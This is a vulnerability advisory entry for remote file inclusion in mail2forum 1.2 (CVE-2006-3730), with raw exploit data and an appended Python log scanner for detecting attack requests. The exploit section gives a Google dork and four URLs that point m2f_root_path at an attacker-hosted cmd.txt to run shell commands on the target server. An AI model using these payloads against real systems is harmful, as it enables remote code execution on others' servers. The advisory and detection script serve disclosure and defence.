Vendor: mail2forum
By: OLiBekaS
CVSS: 7.5 HIGH
Multiple Remote File Include
CWE: 98
Product Name: mail2forum
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: No
Related CVE: CVE-2006-3730
CPE: a:mail2forum:mail2forum:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities

mail2forum is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary remote PHP code in the context of the webserver process.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

Title : mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities

###############################################################################

Discovered By OLiBekaS

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : mail for phpbb (bulletin board/forum software)
version : latest version [ 1.2 ]
URL : http://www.www.mail2forum.com

-----------------------------------------------------------------------------

dork        : allinurl:/m2f_usercp.php?

Exploit     : 
http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-07-17]
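
For defenders checking whether an installation has received requests of the kind listed above, the following added example (not part of the original advisory and not mail2forum code) scans web server access logs for hits on the four named scripts where the client supplies `m2f_root_path`. The common/combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts and parameter named in the advisory.
M2F_SCRIPTS = {"m2f_phpbb204.php", "m2f_forum.php",
               "m2f_mailinglist.php", "m2f_cron.php"}
PARAM = "m2f_root_path"
# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value naming a remote resource: scheme://... or protocol-relative //host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.IGNORECASE)
# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2006:10:00:01 +0000] "GET /forum/m2f/m2f_usercp.php?mode=settings HTTP/1.1" 200 5120',
    '198.51.100.23 - - [17/Jul/2006:10:02:13 +0000] "GET /forum/m2f/m2f_forum.php?m2f_root_path=http://host.example/cmd.txt?&cmd=ls HTTP/1.1" 200 812',
    '198.51.100.23 - - [17/Jul/2006:10:02:40 +0000] "GET /forum/m2f/m2f_cron.php?m2f_root_path=http%253A%252F%252Fhost.example%252Fcmd.txt HTTP/1.0" 200 640',
    '192.0.2.44 - - [17/Jul/2006:10:05:02 +0000] "GET /forum/m2f/m2f_mailinglist.php?m2f_root_path=./ HTTP/1.1" 200 300',
]


def classify(line):
    """Return 'remote', 'supplied' or None for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    try:
        target = urlsplit(m.group(1))
    except ValueError:  # malformed request target
        return None
    if target.path.rsplit("/", 1)[-1].lower() not in M2F_SCRIPTS:
        return None
    values = parse_qs(target.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    # parse_qs decodes once; unquote again to catch double encoding.
    if any(REMOTE_RE.match(unquote(v)) for v in values):
        return "remote"
    return "supplied"  # parameter set by the client, but not to a URL


def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    flagged = ((n, classify(text)) for n, text in enumerate(lines, 1))
    return [(n, verdict) for n, verdict in flagged if verdict]


if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict} {PARAM}")
```

A `remote` verdict means the parameter carried a URL; `supplied` means a client set the parameter at all, which is still worth reviewing because the value is not expected to come from the request.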